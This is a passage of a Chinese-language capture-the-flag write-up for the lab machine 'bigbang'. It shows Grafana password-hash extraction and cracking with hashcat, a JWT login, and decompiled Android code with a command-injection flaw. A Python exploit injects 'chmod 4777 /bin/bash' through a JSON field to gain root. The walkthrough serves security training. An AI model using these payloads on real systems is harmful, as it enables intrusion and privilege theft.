<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
┌──(root㉿kali)-[/home/kali]
└─# curl http://127.0.0.1:9090/login
<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>
┌──(root㉿kali)-[/home/kali]
└─# curl http://127.0.0.1:9090/login -d test
<!doctype html>
<html lang=en>
<title>415 Unsupported Media Type</title>
<h1>Unsupported Media Type</h1>
<p>Did not attempt to load JSON data because the request Content-Type was not 'application/json'.</p>
访问3000端口,为grafana的登录界面
scp命令下载db文件
sudo scp shawking@10.10.11.52:/opt/data/grafana.db ./grafana.db
打开在user表发现salt和password,找到爆破脚本
https://github.com/iamaldi/grafana2hashcat
将password和salt按如下格式写入txt
7e8018a4210efbaeb12f0115580a476fe8f98a4f9bada2720e652654860c59db93577b12201c0151256375d6f883f1b8d960,4umebBJucv通过脚本转换并爆破哈希
┌──(root㉿kali)-[/home/kali/crack/grafana2hashcat]
└─# python grafana2hashcat.py hash.txt -o hash
[+] Grafana2Hashcat
[+] Reading Grafana hashes from: hash.txt
[+] Done! Read 1 hashes in total.
[+] Converting hashes...
[+] Converting hashes complete.
[+] Writing output to 'hash' file.
[+] Now, you can run Hashcat with the following command, for example:
hashcat -m 10900 hashcat_hashes.txt --wordlist wordlist.txt
┌──(root㉿kali)-[/home/kali/crack/grafana2hashcat]
└─# ls
grafana2hashcat.py hash hash.txt README.md
┌──(root㉿kali)-[/home/kali/crack/grafana2hashcat]
└─# hashcat -m 10900 hash --wordlist /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-Intel(R) Core(TM) i7-14700HX, 2789/5642 MB (1024 MB allocatable), 14MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 3 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
sha256:10000:NHVtZWJCSnVjdg==:foAYpCEO+66xLwEVWApHb+j5ik+braJyDmUmVIYMWduTV3sSIBwBUSVjddb4g/G42WA=:bigbang
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10900 (PBKDF2-HMAC-SHA256)
Hash.Target......: sha256:10000:NHVtZWJCSnVjdg==:foAYpCEO+66xLwEVWApHb...G42WA=
Time.Started.....: Wed Apr 2 10:48:03 2025 (1 sec)
Time.Estimated...: Wed Apr 2 10:48:04 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 8912 H/s (6.85ms) @ Accel:64 Loops:1024 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7168/14344385 (0.05%)
Rejected.........: 0/7168 (0.00%)
Restore.Point....: 6272/14344385 (0.04%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:9216-9999
Candidate.Engine.: Device Generator
Candidates.#1....: bugger -> emoemo
Hardware.Mon.#1..: Util: 82%
Started: Wed Apr 2 10:47:42 2025
Stopped: Wed Apr 2 10:48:06 2025
爆破到密码后构造json并post发送到9090端口
┌──(root㉿kali)-[/home/kali/crack/grafana2hashcat]
└─# curl -X POST -v 127.0.0.1:9090/login \
-H "Content-Type: application/json" \
-d '{"username":"developer","password":"bigbang"}'
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 127.0.0.1:9090...
* Connected to 127.0.0.1 (127.0.0.1) port 9090
* using HTTP/1.x
> POST /login HTTP/1.1
> Host: 127.0.0.1:9090
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Type: application/json
> Content-Length: 45
>
* upload completely sent off: 45 bytes
< HTTP/1.1 200 OK
< Server: Werkzeug/3.0.3 Python/3.10.12
< Date: Wed, 02 Apr 2025 14:37:48 GMT
< Content-Type: application/json
< Content-Length: 356
< Connection: close
<
{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTc0MzYwNDY2OCwianRpIjoiNzFmYmJlNzYtZTZjOS00N2RiLTg5OTItZmEzYTlmMmQxMGE2IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldmVsb3BlciIsIm5iZiI6MTc0MzYwNDY2OCwiY3NyZiI6ImE0NDc1NDgwLTY0NzMtNDQyZS05ODBmLTUzYjZmYzA0NDgyMSIsImV4cCI6MTc0MzYwODI2OH0.OLa3FXWSf9Ood1N54xaFkCg-IE4b89VgFjC5PpinZkw"}
* shutting down connection #0
得到access_token是个jwt,拿到3000端口尝试替换,未果
提权到developer用户——apk逆向分析命令注入
切换到developer用户,发现存在一个android目录,下面的satellite-app.apk
下载下来并逆向,得到如下存在漏洞的代码
package q0;
import android.os.AsyncTask;
import android.os.Environment;
import android.widget.Toast;
import com.satellite.bigbang.TakePictureActivity;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
/* loaded from: classes.dex */
public final class b extends AsyncTask {
/* renamed from: a, reason: collision with root package name */
public String f3686a;
/* renamed from: b, reason: collision with root package name */
public final /* synthetic */ TakePictureActivity f3687b;
public b(TakePictureActivity takePictureActivity) {
this.f3687b = takePictureActivity;
}
@Override // android.os.AsyncTask
public final Object doInBackground(Object[] objArr) {
this.f3686a = ((String[]) objArr)[0];
try {
HttpURLConnection httpURLConnection = (HttpURLConnection) new URL("http://app.bigbang.htb:9090/command").openConnection();
httpURLConnection.setRequestMethod("POST");
httpURLConnection.setRequestProperty("Content-Type", "application/json");
httpURLConnection.setRequestProperty("Authorization", "Bearer " + this.f3687b.f2003p);
httpURLConnection.setDoOutput(true);
String str = "{\"command\": \"send_image\", \"output_file\": \"" + this.f3686a + "\"}";
OutputStream outputStream = httpURLConnection.getOutputStream();
try {
byte[] bytes = str.getBytes("utf-8");
outputStream.write(bytes, 0, bytes.length);
outputStream.close();
if (httpURLConnection.getResponseCode() != 200) {
return Boolean.FALSE;
}
InputStream inputStream = httpURLConnection.getInputStream();
FileOutputStream fileOutputStream = new FileOutputStream(new File(Environment.getExternalStoragePublicDirectory(Environment.DIRECTORY_PICTURES), this.f3686a));
try {
byte[] bArr = new byte[1024];
while (true) {
int read = inputStream.read(bArr);
if (read == -1) {
fileOutputStream.close();
inputStream.close();
return Boolean.TRUE;
}
fileOutputStream.write(bArr, 0, read);
}
} finally {
}
} finally {
}
} catch (Exception e2) {
e2.printStackTrace();
return Boolean.FALSE;
}
}
@Override // android.os.AsyncTask
public final void onPostExecute(Object obj) {
boolean booleanValue = ((Boolean) obj).booleanValue();
TakePictureActivity takePictureActivity = this.f3687b;
if (booleanValue) {
Toast.makeText(takePictureActivity, "Request Successful and Image Downloaded", 0).show();
} else {
Toast.makeText(takePictureActivity, "Request Failed", 0).show();
}
}
}此处代码存在命令注入
漏洞代码解析(此处可点击):
漏洞代码:
String str = "{\"command\": \"send_image\", \"output_file\": \"" + this.f3686a + "\"}";
这里 output_file 直接由用户输入 this.f3686a 传递,而没有进行任何过滤或校验。如果服务器没有正确处理输入,则攻击者可以构造恶意 output_file 参数来注入命令,比如:
{"command": "send_image", "output_file": "foo \n chmod 4777 /bin/bash"}
如果服务器在 shell 解析 output_file,攻击者可以利用 \n 换行符执行额外命令(如 chmod 4777 /bin/bash ),从而提权并控制服务器。
import requests
url = "http://127.0.0.1:9090/command"
headers = {
"Host": "127.0.0.1:9090",
"User-Agent": "curl/8.10.1",
"Accept": "*/*",
"Content-Type": "application/json",
"Authorization": "Bearer TOKEN"
}
payload = {
"command": "send_image",
"output_file": "foo \n chmod 4777 /bin/bash"
}
response = requests.post(url, headers=headers, json=payload)
print("Status Code:", response.status_code)
print("Response Body:", response.text)
将jwt替换token,执行脚本
developer@bigbang:~/android$ vim exploit.py
developer@bigbang:~/android$ python3 exploit.py
Status Code: 500
Response Body: {"error":"Error reading image file: [Errno 2] No such file or directory: 'foo \\n chmod 4777 /bin/bash'"}
developer@bigbang:~/android$ ls
exploit.py exp.py satellite-app.apk
developer@bigbang:~/android$ bash -p
bash-5.1# whoami
root
bash-5.1# ls
exploit.py exp.py satellite-app.apk
bash-5.1# cd /root
bash-5.1# ls
resolv.conf root.txt satellite snap
bash-5.1# cat root.txt
xxxxxxxxxxxxx
bash-5.1#
总结:
先通过信息收集得到该站点为wordpress,用wpscan扫到cve漏洞拿到www-data权限——通过wp的默认数据库配置文件拿到mysql,及shawking用户密码——通过9090和3000服务及grafana.db数据库文件拿到developer用户权限——通过android逆向发现命令注入漏洞,提权至root
很棒的文章,就是那些输出可以精简一点